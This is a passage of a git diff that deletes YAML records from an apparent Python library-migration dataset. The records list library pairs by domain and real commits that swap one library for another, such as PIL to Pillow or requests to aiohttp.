gunicorn,waitress -source: gunicorn -target: waitress -domain: HTTP client/server diff --git a/v1/data/libpair/huey,celery.yaml b/v1/data/libpair/huey,celery.yaml deleted file mode 100644 index 192b239..0000000 --- a/v1/data/libpair/huey,celery.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: huey,celery -source: huey -target: celery -domain: Multitasking/multiprocessing diff --git a/v1/data/libpair/jwt,pyjwt.yaml b/v1/data/libpair/jwt,pyjwt.yaml deleted file mode 100644 index 66d94a4..0000000 --- a/v1/data/libpair/jwt,pyjwt.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: jwt,pyjwt -source: jwt -target: pyjwt -domain: Cryptography diff --git a/v1/data/libpair/kafka-python,confluent-kafka.yaml b/v1/data/libpair/kafka-python,confluent-kafka.yaml deleted file mode 100644 index e75632a..0000000 --- a/v1/data/libpair/kafka-python,confluent-kafka.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: kafka-python,confluent-kafka -source: kafka-python -target: confluent-kafka -domain: API wrapper diff --git a/v1/data/libpair/keras,torch.yaml b/v1/data/libpair/keras,torch.yaml deleted file mode 100644 index 10afd41..0000000 --- a/v1/data/libpair/keras,torch.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: keras,torch -source: keras -target: torch -domain: Machine learning diff --git a/v1/data/libpair/lockfile,fasteners.yaml b/v1/data/libpair/lockfile,fasteners.yaml deleted file mode 100644 index cabe3a7..0000000 --- a/v1/data/libpair/lockfile,fasteners.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: lockfile,fasteners -source: lockfile -target: fasteners -domain: Multitasking/multiprocessing diff --git a/v1/data/libpair/logbook,loguru.yaml b/v1/data/libpair/logbook,loguru.yaml deleted file mode 100644 index 7d29268..0000000 --- a/v1/data/libpair/logbook,loguru.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: logbook,loguru -source: logbook -target: loguru -domain: Logging/tracing diff --git a/v1/data/libpair/magic,python-magic.yaml b/v1/data/libpair/magic,python-magic.yaml deleted file mode 100644 index b7d9be1..0000000 --- a/v1/data/libpair/magic,python-magic.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: magic,python-magic -source: magic -target: python-magic -domain: Utilities diff --git a/v1/data/libpair/mysql-python,mysqlclient.yaml b/v1/data/libpair/mysql-python,mysqlclient.yaml deleted file mode 100644 index a6838b7..0000000 --- a/v1/data/libpair/mysql-python,mysqlclient.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: mysql-python,mysqlclient -source: mysql-python -target: mysqlclient -domain: Database client diff --git a/v1/data/libpair/mysql-python,pymysql.yaml b/v1/data/libpair/mysql-python,pymysql.yaml deleted file mode 100644 index b875183..0000000 --- a/v1/data/libpair/mysql-python,pymysql.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: mysql-python,pymysql -source: mysql-python -target: pymysql -domain: Database client diff --git a/v1/data/libpair/mysqlclient,psycopg2.yaml b/v1/data/libpair/mysqlclient,psycopg2.yaml deleted file mode 100644 index 9fcc574..0000000 --- a/v1/data/libpair/mysqlclient,psycopg2.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: mysqlclient,psycopg2 -source: mysqlclient -target: psycopg2 -domain: Database client diff --git a/v1/data/libpair/openpyxl,xlsxwriter.yaml b/v1/data/libpair/openpyxl,xlsxwriter.yaml deleted file mode 100644 index 35a3812..0000000 --- a/v1/data/libpair/openpyxl,xlsxwriter.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: openpyxl,xlsxwriter -source: openpyxl -target: xlsxwriter -domain: File reader/writer diff --git a/v1/data/libpair/pandas,numpy.yaml b/v1/data/libpair/pandas,numpy.yaml deleted file mode 100644 index 579183e..0000000 
--- a/v1/data/libpair/pandas,numpy.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pandas,numpy -source: pandas -target: numpy -domain: Data processing diff --git a/v1/data/libpair/pil,pillow.yaml b/v1/data/libpair/pil,pillow.yaml deleted file mode 100644 index 5e6e894..0000000 --- a/v1/data/libpair/pil,pillow.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pil,pillow -source: pil -target: pillow -domain: Image processing diff --git a/v1/data/libpair/pillow,torchvision.yaml b/v1/data/libpair/pillow,torchvision.yaml deleted file mode 100644 index 4917789..0000000 --- a/v1/data/libpair/pillow,torchvision.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pillow,torchvision -source: pillow -target: torchvision -domain: Image processing diff --git a/v1/data/libpair/py-bcrypt,bcrypt.yaml b/v1/data/libpair/py-bcrypt,bcrypt.yaml deleted file mode 100644 index 4fdc5e5..0000000 --- a/v1/data/libpair/py-bcrypt,bcrypt.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: py-bcrypt,bcrypt -source: py-bcrypt -target: bcrypt -domain: Cryptography diff --git a/v1/data/libpair/pycrypto,cryptography.yaml b/v1/data/libpair/pycrypto,cryptography.yaml deleted file mode 100644 index 0659c58..0000000 --- a/v1/data/libpair/pycrypto,cryptography.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pycrypto,cryptography -source: pycrypto -target: cryptography -domain: Cryptography diff --git a/v1/data/libpair/pycrypto,pycryptodome.yaml b/v1/data/libpair/pycrypto,pycryptodome.yaml deleted file mode 100644 index d870ef9..0000000 --- a/v1/data/libpair/pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -domain: Cryptography diff --git a/v1/data/libpair/pycryptodome,pycryptodomex.yaml b/v1/data/libpair/pycryptodome,pycryptodomex.yaml deleted file mode 100644 index c34ef6e..0000000 --- a/v1/data/libpair/pycryptodome,pycryptodomex.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pycryptodome,pycryptodomex -source: pycryptodome -target: pycryptodomex -domain: Cryptography diff --git a/v1/data/libpair/pymilvus-orm,pymilvus.yaml b/v1/data/libpair/pymilvus-orm,pymilvus.yaml deleted file mode 100644 index 3bb5efd..0000000 --- a/v1/data/libpair/pymilvus-orm,pymilvus.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pymilvus-orm,pymilvus -source: pymilvus-orm -target: pymilvus -domain: Database client diff --git a/v1/data/libpair/pyqt5,pyside6.yaml b/v1/data/libpair/pyqt5,pyside6.yaml deleted file mode 100644 index 33d2c64..0000000 --- a/v1/data/libpair/pyqt5,pyside6.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pyqt5,pyside6 -source: pyqt5 -target: pyside6 -domain: Development framework/extension diff --git a/v1/data/libpair/python-ldap,ldap3.yaml b/v1/data/libpair/python-ldap,ldap3.yaml deleted file mode 100644 index f745b33..0000000 --- a/v1/data/libpair/python-ldap,ldap3.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: python-ldap,ldap3 -source: python-ldap -target: ldap3 -domain: Utilities diff --git a/v1/data/libpair/python-social-auth,social-auth-app-django.yaml b/v1/data/libpair/python-social-auth,social-auth-app-django.yaml deleted file mode 100644 index c688824..0000000 --- a/v1/data/libpair/python-social-auth,social-auth-app-django.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: python-social-auth,social-auth-app-django -source: python-social-auth -target: social-auth-app-django -domain: Development framework/extension diff --git a/v1/data/libpair/pytz,pendulum.yaml b/v1/data/libpair/pytz,pendulum.yaml deleted file mode 100644 index ee7844e..0000000 --- a/v1/data/libpair/pytz,pendulum.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pytz,pendulum 
-source: pytz -target: pendulum -domain: Utilities diff --git a/v1/data/libpair/pyyaml,ruamel.yaml.yaml b/v1/data/libpair/pyyaml,ruamel.yaml.yaml deleted file mode 100644 index 2d9fb92..0000000 --- a/v1/data/libpair/pyyaml,ruamel.yaml.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: pyyaml,ruamel.yaml -source: pyyaml -target: ruamel.yaml -domain: File reader/writer diff --git a/v1/data/libpair/raven,sentry-sdk.yaml b/v1/data/libpair/raven,sentry-sdk.yaml deleted file mode 100644 index f0c4609..0000000 --- a/v1/data/libpair/raven,sentry-sdk.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: raven,sentry-sdk -source: raven -target: sentry-sdk -domain: Logging/tracing diff --git a/v1/data/libpair/requests,aiohttp.yaml b/v1/data/libpair/requests,aiohttp.yaml deleted file mode 100644 index f76988b..0000000 --- a/v1/data/libpair/requests,aiohttp.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: requests,aiohttp -source: requests -target: aiohttp -domain: HTTP client/server diff --git a/v1/data/libpair/retrying,tenacity.yaml b/v1/data/libpair/retrying,tenacity.yaml deleted file mode 100644 index e6c8ec5..0000000 --- a/v1/data/libpair/retrying,tenacity.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: retrying,tenacity -source: retrying -target: tenacity -domain: Utilities diff --git a/v1/data/libpair/ruamel.yaml,pyyaml.yaml b/v1/data/libpair/ruamel.yaml,pyyaml.yaml deleted file mode 100644 index b9a70e0..0000000 --- a/v1/data/libpair/ruamel.yaml,pyyaml.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: ruamel.yaml,pyyaml -source: ruamel.yaml -target: pyyaml -domain: File reader/writer diff --git a/v1/data/libpair/s3cmd,awscli.yaml b/v1/data/libpair/s3cmd,awscli.yaml deleted file mode 100644 index b1a47ca..0000000 --- a/v1/data/libpair/s3cmd,awscli.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: s3cmd,awscli -source: s3cmd -target: awscli -domain: API wrapper diff --git a/v1/data/libpair/scapy-python3,scapy.yaml b/v1/data/libpair/scapy-python3,scapy.yaml deleted file mode 100644 index 606bfd3..0000000 --- a/v1/data/libpair/scapy-python3,scapy.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: scapy-python3,scapy -source: scapy-python3 -target: scapy -domain: Networking diff --git a/v1/data/libpair/sklearn,torch.yaml b/v1/data/libpair/sklearn,torch.yaml deleted file mode 100644 index 5500d4f..0000000 --- a/v1/data/libpair/sklearn,torch.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: sklearn,torch -source: sklearn -target: torch -domain: Machine learning diff --git a/v1/data/libpair/slackclient,slack-sdk.yaml b/v1/data/libpair/slackclient,slack-sdk.yaml deleted file mode 100644 index 72921c4..0000000 --- a/v1/data/libpair/slackclient,slack-sdk.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: slackclient,slack-sdk -source: slackclient -target: slack-sdk -domain: API wrapper diff --git a/v1/data/libpair/slugify,python-slugify.yaml b/v1/data/libpair/slugify,python-slugify.yaml deleted file mode 100644 index 264dc96..0000000 --- a/v1/data/libpair/slugify,python-slugify.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: slugify,python-slugify -source: slugify -target: python-slugify -domain: Utilities diff --git a/v1/data/libpair/tensorboard,tensorboardx.yaml b/v1/data/libpair/tensorboard,tensorboardx.yaml deleted file mode 100644 index eb9449f..0000000 --- a/v1/data/libpair/tensorboard,tensorboardx.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: tensorboard,tensorboardx -source: tensorboard -target: tensorboardx -domain: Machine learning diff --git a/v1/data/libpair/urllib,urllib3.yaml b/v1/data/libpair/urllib,urllib3.yaml deleted file mode 100644 index 54c0547..0000000 --- 
a/v1/data/libpair/urllib,urllib3.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: urllib,urllib3 -source: urllib -target: urllib3 -domain: HTTP client/server diff --git a/v1/data/libpair/uwsgi,gunicorn.yaml b/v1/data/libpair/uwsgi,gunicorn.yaml deleted file mode 100644 index 078e15f..0000000 --- a/v1/data/libpair/uwsgi,gunicorn.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: uwsgi,gunicorn -source: uwsgi -target: gunicorn -domain: HTTP client/server diff --git a/v1/data/libpair/websocket-client,tornado.yaml b/v1/data/libpair/websocket-client,tornado.yaml deleted file mode 100644 index 36268ee..0000000 --- a/v1/data/libpair/websocket-client,tornado.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: websocket-client,tornado -source: websocket-client -target: tornado -domain: Networking diff --git a/v1/data/libpair/xlrd,openpyxl.yaml b/v1/data/libpair/xlrd,openpyxl.yaml deleted file mode 100644 index 389024a..0000000 --- a/v1/data/libpair/xlrd,openpyxl.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: xlrd,openpyxl -source: xlrd -target: openpyxl -domain: File reader/writer diff --git a/v1/data/libpair/xlsxwriter,openpyxl.yaml b/v1/data/libpair/xlsxwriter,openpyxl.yaml deleted file mode 100644 index 4679951..0000000 --- a/v1/data/libpair/xlsxwriter,openpyxl.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: xlsxwriter,openpyxl -source: xlsxwriter -target: openpyxl -domain: File reader/writer diff --git a/v1/data/migration/002f5bd_flask,quart.yaml b/v1/data/migration/002f5bd_flask,quart.yaml deleted file mode 100644 index 193e163..0000000 --- a/v1/data/migration/002f5bd_flask,quart.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: 002f5bd_flask,quart -source: flask -target: quart -repo: elblogbruno/notionai-mymind -commit: 002f5bde5d5d5f2eaaf6999e41e4619817c10400 -pair_id: flask,quart -commit_message: 'feat: Faster and more reliable thanks to switching to an async based - server with Quart and more.' -commit_url: https://github.com/elblogbruno/notionai-mymind/commit/002f5bde -code_changes: -- filepath: Python Server/app/server.py - lines: - - 149:110 - - 154:115 - - '20:14' - - 4-6:3 - - 80:55-57 diff --git a/v1/data/migration/0171fb9_pil,pillow.yaml b/v1/data/migration/0171fb9_pil,pillow.yaml deleted file mode 100644 index 90de713..0000000 --- a/v1/data/migration/0171fb9_pil,pillow.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 0171fb9_pil,pillow -source: pil -target: pillow -repo: shoebot/shoebot -commit: 0171fb9ff6ed2fed71dcfe82eef7ca723d609fcf -pair_id: pil,pillow -commit_message: 'Reorganise requirements - - - Optional / difficult packages at the end. - - - Use Pillow instead of PIL - change Img to work with this.' 
-commit_url: https://github.com/shoebot/shoebot/commit/0171fb9f -code_changes: -- filepath: shoebot/data/img.py - lines: - - '9:9' diff --git a/v1/data/migration/02b064b_pycryptodome,pycryptodomex.yaml b/v1/data/migration/02b064b_pycryptodome,pycryptodomex.yaml deleted file mode 100644 index cc86cd7..0000000 --- a/v1/data/migration/02b064b_pycryptodome,pycryptodomex.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 02b064b_pycryptodome,pycryptodomex -source: pycryptodome -target: pycryptodomex -repo: snemes/malware-analysis -commit: 02b064b4acc0ae26d6c61246ab3f1f45b750091a -pair_id: pycryptodome,pycryptodomex -commit_message: Minor tweaks, switched to pycryptodomex instead of pycryptodome to - avoid collision with PyCrypto -commit_url: https://github.com/snemes/malware-analysis/commit/02b064b4 -code_changes: -- filepath: trickbot/trickbot_artifact_decrypter.py - lines: - - 11-14:11-14 diff --git a/v1/data/migration/03a9621_s3cmd,awscli.yaml b/v1/data/migration/03a9621_s3cmd,awscli.yaml deleted file mode 100644 index d0d254f..0000000 --- a/v1/data/migration/03a9621_s3cmd,awscli.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 03a9621_s3cmd,awscli -source: s3cmd -target: awscli -repo: drivendata/cookiecutter-data-science -commit: 03a96219ea30b658a005b9f1645773855313ae09 -pair_id: s3cmd,awscli -commit_message: 'Update to awscli so Python 3 works - - - Closes #23' -commit_url: https://github.com/drivendata/cookiecutter-data-science/commit/03a96219 -code_changes: [] diff --git a/v1/data/migration/0411d6a_raven,sentry-sdk.yaml b/v1/data/migration/0411d6a_raven,sentry-sdk.yaml deleted file mode 100644 index 8b1eeae..0000000 --- a/v1/data/migration/0411d6a_raven,sentry-sdk.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: 0411d6a_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: comses/comses.net -commit: 0411d6a105672268bf2519d14616da21d24a7762 -pair_id: raven,sentry-sdk -commit_message: 'upgrade to new sentry sdk: - - - django: https://docs.sentry.io/platforms/python/django/ - - - javascript: https://docs.sentry.io/platforms/javascript/ - - - TODO: add Vue integration (@cpritcha want to take the lead on this?) - - https://docs.sentry.io/platforms/javascript/vue/' -commit_url: https://github.com/comses/comses.net/commit/0411d6a1 -code_changes: [] diff --git a/v1/data/migration/047263b_flask-restful,flask-restplus.yaml b/v1/data/migration/047263b_flask-restful,flask-restplus.yaml deleted file mode 100644 index 5973287..0000000 --- a/v1/data/migration/047263b_flask-restful,flask-restplus.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 047263b_flask-restful,flask-restplus -source: flask-restful -target: flask-restplus -repo: kizniche/mycodo -commit: 047263beb9e4301c30eef0f44d8d93c722b31f20 -pair_id: flask-restful,flask-restplus -commit_message: Move from Flask_Restful to Flask_RestPlus (#705) -commit_url: https://github.com/kizniche/mycodo/commit/047263be -code_changes: -- filepath: mycodo/mycodo_flask/api.py - lines: - - '5:7' diff --git a/v1/data/migration/04a5913_pil,pillow.yaml b/v1/data/migration/04a5913_pil,pillow.yaml deleted file mode 100644 index f451ac8..0000000 --- a/v1/data/migration/04a5913_pil,pillow.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: 04a5913_pil,pillow -source: pil -target: pillow -repo: pculture/mirocommunity -commit: 04a5913ad380cb7ec7bebdc490d672107f3ee82d -pair_id: pil,pillow -commit_message: 'fix PIL build issues - - - PIL doesn''t build correctly on recent versions of Debian; it can''t find the - - ZLIB include files. Pillow is a forked version which does build correctly.' 
-commit_url: https://github.com/pculture/mirocommunity/commit/04a5913a -code_changes: [] diff --git a/v1/data/migration/054d5d2_fuzzywuzzy,rapidfuzz.yaml b/v1/data/migration/054d5d2_fuzzywuzzy,rapidfuzz.yaml deleted file mode 100644 index 28ef923..0000000 --- a/v1/data/migration/054d5d2_fuzzywuzzy,rapidfuzz.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: 054d5d2_fuzzywuzzy,rapidfuzz -source: fuzzywuzzy -target: rapidfuzz -repo: nlpia/nlpia-bot -commit: 054d5d207cba12d9b5c4765454be1c51424ea4f3 -pair_id: fuzzywuzzy,rapidfuzz -commit_message: 'use rapidfuzz instead of fuzzywuzzy - - - - Former-commit-id: e7d4fd555779cd407fa5e09e1944b2ba56c5db12 [formerly 53c3bce9c5f9bcec87475759fe040289d45ba1d6] - - Former-commit-id: 1503611c7150cb42575d5b94b507ba7748d21697' -commit_url: https://github.com/nlpia/nlpia-bot/commit/054d5d20 -code_changes: -- filepath: qary/skills/search_fuzzy_bots.py - lines: - - '8:8' diff --git a/v1/data/migration/08e7ffa_gunicorn,waitress.yaml b/v1/data/migration/08e7ffa_gunicorn,waitress.yaml deleted file mode 100644 index 7959236..0000000 --- a/v1/data/migration/08e7ffa_gunicorn,waitress.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 08e7ffa_gunicorn,waitress -source: gunicorn -target: waitress -repo: pbacterio/cookiecutter-django-paas -commit: 08e7ffa9b64b25a2b539b5b9ccf757c9b11a370c -pair_id: gunicorn,waitress -commit_message: Replaces gunicorn for waitress. http://blog.etianen.com/blog/2014/01/19/gunicorn-heroku-django/ -commit_url: https://github.com/pbacterio/cookiecutter-django-paas/commit/08e7ffa9 -code_changes: [] diff --git a/v1/data/migration/0911992_pycrypto,pycryptodome.yaml b/v1/data/migration/0911992_pycrypto,pycryptodome.yaml deleted file mode 100644 index e4653be..0000000 --- a/v1/data/migration/0911992_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: 0911992_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: confluentinc/ducktape -commit: 0911992301d30bb315df4e9bab3b83254c3036fa -pair_id: pycrypto,pycryptodome -commit_message: 'ST-1307: Switch from pycrypto to pycryptodome and update to a modern - version' -commit_url: https://github.com/confluentinc/ducktape/commit/09119923 -code_changes: [] diff --git a/v1/data/migration/0a65bcc_raven,sentry-sdk.yaml b/v1/data/migration/0a65bcc_raven,sentry-sdk.yaml deleted file mode 100644 index f01ec1f..0000000 --- a/v1/data/migration/0a65bcc_raven,sentry-sdk.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 0a65bcc_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: habitissimo/myaas -commit: 0a65bcc2ce97a2e3ad9b028b1cf9bcc58499f5d9 -pair_id: raven,sentry-sdk -commit_message: update sentry client -commit_url: https://github.com/habitissimo/myaas/commit/0a65bcc2 -code_changes: -- filepath: src/runserver.py - lines: - - 7-8:6-12 diff --git a/v1/data/migration/0a70f2b_flask,quart.yaml b/v1/data/migration/0a70f2b_flask,quart.yaml deleted file mode 100644 index 4747dca..0000000 --- a/v1/data/migration/0a70f2b_flask,quart.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: 0a70f2b_flask,quart -source: flask -target: quart -repo: pgjones/faster_than_flask_article -commit: 0a70f2bddae90da13da5bce2b77ea56355ecc5d1 -pair_id: flask,quart -commit_message: Quart version -commit_url: https://github.com/pgjones/faster_than_flask_article/commit/0a70f2bd -code_changes: -- filepath: app/films.py - lines: - - '1:1' -- filepath: app/run.py - lines: - - '4:5' - - '35:12' -- filepath: app/reviews.py - lines: - - '1:1' - - '8:8' diff --git a/v1/data/migration/0d78d19_lockfile,fasteners.yaml 
b/v1/data/migration/0d78d19_lockfile,fasteners.yaml deleted file mode 100644 index e986f41..0000000 --- a/v1/data/migration/0d78d19_lockfile,fasteners.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: 0d78d19_lockfile,fasteners -source: lockfile -target: fasteners -repo: pantsbuild/pants -commit: 0d78d19ff4a8a44228eb59fac209e0e71e2d9152 -pair_id: lockfile,fasteners -commit_message: 'Add OwnerPrintingInterProcessFileLock and replace OwnerPrintingPIDLockFile. - - - * Remove lockfile dependency and use fasteners instead. - - * Use a file lock instead of writing out a pid to the lock file. - - * Use a separate message file to prevent stomping on the file lock. - - - Testing Done: - - CI is green: https://travis-ci.org/pantsbuild/pants/builds/119942027 - - - Bugs closed: 3124 - - - Reviewed at https://rbcommons.com/s/twitter/r/3633/' -commit_url: https://github.com/pantsbuild/pants/commit/0d78d19f -code_changes: [] diff --git a/v1/data/migration/0df86b5_logbook,loguru.yaml b/v1/data/migration/0df86b5_logbook,loguru.yaml deleted file mode 100644 index 0d55b0f..0000000 --- a/v1/data/migration/0df86b5_logbook,loguru.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 0df86b5_logbook,loguru -source: logbook -target: loguru -repo: thombashi/pingparsing -commit: 0df86b5934719de7ab7eab71f1a5006996bc5337 -pair_id: logbook,loguru -commit_message: Replace the logging library -commit_url: https://github.com/thombashi/pingparsing/commit/0df86b59 -code_changes: [] diff --git a/v1/data/migration/12e3e80_ruamel.yaml,pyyaml.yaml b/v1/data/migration/12e3e80_ruamel.yaml,pyyaml.yaml deleted file mode 100644 index 48e9582..0000000 --- a/v1/data/migration/12e3e80_ruamel.yaml,pyyaml.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: 12e3e80_ruamel.yaml,pyyaml -source: ruamel.yaml -target: pyyaml -repo: cloud-custodian/cloud-custodian -commit: 12e3e8084ddb2e7f5ccbc5ea3c3bd3e4c7e9c207 -pair_id: ruamel.yaml,pyyaml -commit_message: tools/c7n_mailer - switch ruamel dependency to pyyaml (#5521) -commit_url: https://github.com/cloud-custodian/cloud-custodian/commit/12e3e808 -code_changes: -- filepath: tools/c7n_mailer/c7n_mailer/replay.py - lines: - - '25:18' -- filepath: tools/c7n_mailer/c7n_mailer/utils.py - lines: - - '28:22' -- filepath: tools/c7n_mailer/c7n_mailer/cli.py - lines: - - '15:10' diff --git a/v1/data/migration/14388c3_pycrypto,pycryptodome.yaml b/v1/data/migration/14388c3_pycrypto,pycryptodome.yaml deleted file mode 100644 index bd020ad..0000000 --- a/v1/data/migration/14388c3_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 14388c3_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: camptocamp/c2cgeoportal -commit: 14388c3d85ab164d7b36b1331534913a1c9d6c9a -pair_id: pycrypto,pycryptodome -commit_message: Use pycryptodome instance of the unmaintained pycrypto -commit_url: https://github.com/camptocamp/c2cgeoportal/commit/14388c3d -code_changes: -- filepath: geoportal/c2cgeoportal_geoportal/scripts/urllogin.py - lines: - - '48:48' - - 53:53-54 -- filepath: geoportal/c2cgeoportal_geoportal/__init__.py - lines: - - 322-323:326-327 diff --git a/v1/data/migration/1476b62_python-social-auth,social-auth-app-django.yaml b/v1/data/migration/1476b62_python-social-auth,social-auth-app-django.yaml deleted file mode 100644 index 92a52f7..0000000 --- a/v1/data/migration/1476b62_python-social-auth,social-auth-app-django.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 1476b62_python-social-auth,social-auth-app-django -source: python-social-auth -target: social-auth-app-django -repo: onespacemedia/project-template -commit: 
1476b623632cb53d778b5c2d9899e905ba2ab9c6 -pair_id: python-social-auth,social-auth-app-django -commit_message: 'Migrate to from python-social-auth to social-auth-app-django - - - Closes #110' -commit_url: https://github.com/onespacemedia/project-template/commit/1476b623 -code_changes: [] diff --git a/v1/data/migration/19dde42_pycryptodome,pycryptodomex.yaml b/v1/data/migration/19dde42_pycryptodome,pycryptodomex.yaml deleted file mode 100644 index 87339bc..0000000 --- a/v1/data/migration/19dde42_pycryptodome,pycryptodomex.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: 19dde42_pycryptodome,pycryptodomex -source: pycryptodome -target: pycryptodomex -repo: azure/aztk -commit: 19dde429a702c29bdcf86a69805053ecfd02edee -pair_id: pycryptodome,pycryptodomex -commit_message: 'Fix: switch from pycryptodome to pycryptodomex (#564) - - - Fix: switch from pycryptodome to pycryptodomex' -commit_url: https://github.com/azure/aztk/commit/19dde429 -code_changes: -- filepath: aztk/client.py - lines: - - '15:15' -- filepath: aztk/node_scripts/install/create_user.py - lines: - - 4-5:4-5 -- filepath: aztk/spark/models/models.py - lines: - - '2:2' -- filepath: aztk/utils/secure_utils.py - lines: - - 1-3:1-3 diff --git a/v1/data/migration/1c574c1_requests,aiohttp.yaml b/v1/data/migration/1c574c1_requests,aiohttp.yaml deleted file mode 100644 index 6ae17c9..0000000 --- a/v1/data/migration/1c574c1_requests,aiohttp.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 1c574c1_requests,aiohttp -source: requests -target: aiohttp -repo: lordofpolls/rule34-api-wrapper -commit: 1c574c14c88c0cad7705c9b81b9b4b3f75ea7485 -pair_id: requests,aiohttp -commit_message: Removed unused requirements, and added new ones -commit_url: https://github.com/lordofpolls/rule34-api-wrapper/commit/1c574c14 -code_changes: [] diff --git a/v1/data/migration/1d8923a_requests,aiohttp.yaml b/v1/data/migration/1d8923a_requests,aiohttp.yaml deleted file mode 100644 index 11d2629..0000000 --- a/v1/data/migration/1d8923a_requests,aiohttp.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: 1d8923a_requests,aiohttp -source: requests -target: aiohttp -repo: raptor123471/dingolingo -commit: 1d8923abae93915ad877774e0fdc812d6c53a70b -pair_id: requests,aiohttp -commit_message: Replace requests with aiohttp -commit_url: https://github.com/raptor123471/dingolingo/commit/1d8923ab -code_changes: -- filepath: musicbot/linkutils.py - lines: - - '1:1' - - 35-36:36-38 - - 98:100-102 diff --git a/v1/data/migration/22cc3f0_flask,quart.yaml b/v1/data/migration/22cc3f0_flask,quart.yaml deleted file mode 100644 index 04302d8..0000000 --- a/v1/data/migration/22cc3f0_flask,quart.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 22cc3f0_flask,quart -source: flask -target: quart -repo: intel/stacks-usecase -commit: 22cc3f007a3267ca09a3f53b84fdbfff1f045e88 -pair_id: flask,quart -commit_message: switching flask to a high perf asyc server -commit_url: https://github.com/intel/stacks-usecase/commit/22cc3f00 -code_changes: -- filepath: github-issue-classification/python/rest.py - lines: - - 19:19-21 - - '23:27' - - 42-44:49-51 - - '46:53' - - '51:58' diff --git a/v1/data/migration/24a848d_flask,fastapi.yaml b/v1/data/migration/24a848d_flask,fastapi.yaml deleted file mode 100644 index 645a9e7..0000000 --- a/v1/data/migration/24a848d_flask,fastapi.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 24a848d_flask,fastapi -source: flask -target: fastapi -repo: bretttolbert/verbecc-svc -commit: 24a848d285ae2c6f3e5b06d1a8ee718cb3f17133 -pair_id: flask,fastapi -commit_message: switched from Flask to FastAPI/uvicorn -commit_url: 
https://github.com/bretttolbert/verbecc-svc/commit/24a848d2 -code_changes: -- filepath: python/verb_conjugate_fr/__init__.py - lines: - - 2-3:2 diff --git a/v1/data/migration/24a848d_flask,uvicorn.yaml b/v1/data/migration/24a848d_flask,uvicorn.yaml deleted file mode 100644 index 2a9087f..0000000 --- a/v1/data/migration/24a848d_flask,uvicorn.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 24a848d_flask,uvicorn -source: flask -target: uvicorn -repo: bretttolbert/verbecc-svc -commit: 24a848d285ae2c6f3e5b06d1a8ee718cb3f17133 -pair_id: flask,uvicorn -commit_message: switched from Flask to FastAPI/uvicorn -commit_url: https://github.com/bretttolbert/verbecc-svc/commit/24a848d2 -code_changes: [] diff --git a/v1/data/migration/26c8e74_dataproperty,typepy.yaml b/v1/data/migration/26c8e74_dataproperty,typepy.yaml deleted file mode 100644 index bd44c97..0000000 --- a/v1/data/migration/26c8e74_dataproperty,typepy.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 26c8e74_dataproperty,typepy -source: dataproperty -target: typepy -repo: thombashi/sqlitebiter -commit: 26c8e7467fb764d6abca03d6830f7679cbfc3ea1 -pair_id: 